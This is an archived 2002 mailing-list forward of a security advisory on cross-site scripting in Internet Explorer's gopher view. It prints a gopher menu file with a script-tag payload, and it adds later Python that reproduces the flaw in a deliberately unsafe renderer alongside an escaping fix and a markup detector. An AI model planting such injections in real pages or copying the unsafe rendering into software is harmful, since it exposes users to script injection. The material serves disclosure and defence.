[Fwd: IE gopher cross site scripting]

From: KF (dotslashat_private)
Date: Sun Jun 16 2002 - 20:17:19 PDT


    Not sure why but I can't seem to get this message through to the lists...
    -KF
    
    
    
    

    attached mail follows:


    ======================================================================
    Strategic Reconnaissance Team Security Advisory (SRT2002-06-16-0314)
    Topic  : IE gopher view Cross Site Scripting
    Date   : June 16, 2002
    Credit : KF dotslash[at]snosoft.com
    Site   : http://www.snosoft.com
    ======================================================================

    .: Description:
    ---------------
    Internet Explorer 5 (and others?) allow cross site scripting in gopher
    view. This is currently the least of your worries with gopher but it may
    still pose a threat.

    .: Impact:
    ----------
    The usual cross site scripting attack consequences are subject here. Your
    script must fit into a finite amount of character space or it will be
    truncated, thus making it fail.

    In order to duplicate this attack I used gn gopherd on my linux box. I
    made a malicious .cache file as shown below in order to exploit the
    browser.

    [root@localhost dir]# cat menu
    Name=<script>alert('When can we see the source code bill?')</script>
    Path=0/hrmm
    Type=0
    Host=10.0.1.234
    Port=70
    [root@localhost dir]# /root/gn-2.25-DEV/mkcache/mkcache
    Warning: Unable to open mime type file: /path/to/src/mkcache/gn_mime.types
    Using defaults.
    Writing cache file ./.cache

    Next open the link gopher://10.0.1.234/1 ... voila, javascript alert with
    extra cheese.

    .: Systems Affected:
    --------------------
    Microsoft based machines with unknown versions of IExplorer.

    .: Solution:
    ------------
    Step 1.) Ask your vendor for the source code so that you can make your
    own patch. Oh wait that would make you an "open source terrorist".
    Step 2.) In the event that step one fails please format your c drive.
    ======================================================================
    -KF
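The bug KF describes is a rendering one: the browser copies the display string of each gopher menu item straight into the HTML it builds for "gopher view", so markup in that string becomes live markup in the page. The Python below is an added example, not code from the advisory, from gn gopherd or from Microsoft. It assumes the RFC 1436 menu line layout (type character, display string, selector, host and port separated by tabs, list terminated by a line holding a single "."), parses a constructed sample menu whose second entry reuses the display string from the advisory, and contrasts a renderer with the described defect against one that escapes the display text and the generated link. It also includes a small check a server operator or proxy could use to flag menu entries that carry markup.

```python
"""Parse Gopher menu lines and render them as HTML without letting markup
in the display string reach the page.

Added example, not code from the advisory, gn gopherd or Internet Explorer.
Assumes the RFC 1436 menu line layout:
    <type><display>\t<selector>\t<host>\t<port>\r\n   ...   .\r\n
The sample menu below is constructed; the second entry reuses the display
string shown in the advisory.
"""
import html
from dataclasses import dataclass
from typing import List
from urllib.parse import quote

# Constructed sample menu, as a gopher server would send it (CRLF terminated).
SAMPLE_MENU = (
    "0About this server\t0/about\t10.0.1.234\t70\r\n"
    "0<script>alert('When can we see the source code bill?')</script>"
    "\t0/hrmm\t10.0.1.234\t70\r\n"
    "1Other servers\t1/other\t10.0.1.234\t70\r\n"
    ".\r\n"
)


@dataclass
class MenuItem:
    item_type: str   # single type character, e.g. "0" text file, "1" menu
    display: str     # user-visible label; untrusted, chosen by the server
    selector: str    # path sent back to the server when the item is opened
    host: str
    port: int


def parse_menu(raw: str) -> List[MenuItem]:
    """Split a gopher menu into items, stopping at the terminating '.' line.
    Malformed lines (too few fields, non-numeric port) are skipped rather
    than guessed at."""
    items = []
    for line in raw.split("\r\n"):
        if line == ".":
            break
        if not line:
            continue
        fields = line.split("\t")
        if len(fields) < 4:
            continue
        type_and_display, selector, host, port = fields[:4]
        if not port.isdigit():
            continue
        items.append(MenuItem(type_and_display[:1], type_and_display[1:],
                              selector, host, int(port)))
    return items


def render_unsafe(items: List[MenuItem]) -> str:
    """Mirrors the defect the advisory describes: every field is copied into
    the HTML verbatim, so a <script> in the display string runs in the
    viewer's page."""
    return "".join(
        f'<a href="gopher://{i.host}:{i.port}/{i.item_type}{i.selector}">'
        f"{i.display}</a><br>"
        for i in items
    )


def render_safe(items: List[MenuItem]) -> str:
    """Hardened renderer: HTML-escape the display text so it is shown as
    text, percent-encode the selector, and escape the finished URL before
    placing it in the href attribute."""
    out = []
    for i in items:
        href = (f"gopher://{i.host}:{i.port}/"
                f"{i.item_type}{quote(i.selector, safe='/')}")
        out.append(f'<a href="{html.escape(href, quote=True)}">'
                   f"{html.escape(i.display)}</a><br>")
    return "".join(out)


def suspicious_items(items: List[MenuItem]) -> List[MenuItem]:
    """Cheap server-side / proxy-side check: a gopher display string has no
    business containing angle brackets. Useful for logging, not as the only
    defence; output encoding in the client is what actually fixes the bug."""
    return [i for i in items if "<" in i.display or ">" in i.display]


if __name__ == "__main__":
    menu = parse_menu(SAMPLE_MENU)
    print("unsafe:", render_unsafe(menu))
    print("safe:  ", render_safe(menu))
    print("flagged:", [i.display for i in suspicious_items(menu)])
```

Running the file prints both renderings; the unsafe one contains a live `<script>` element while the safe one shows the same bytes as inert `&lt;script&gt;` text. The escaping in `render_safe` is the client-side fix the advisory is asking the vendor for; `suspicious_items` is only a visibility aid.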



    This archive was generated by hypermail 2b30 : Mon Jun 17 2002 - 09:05:02 PDT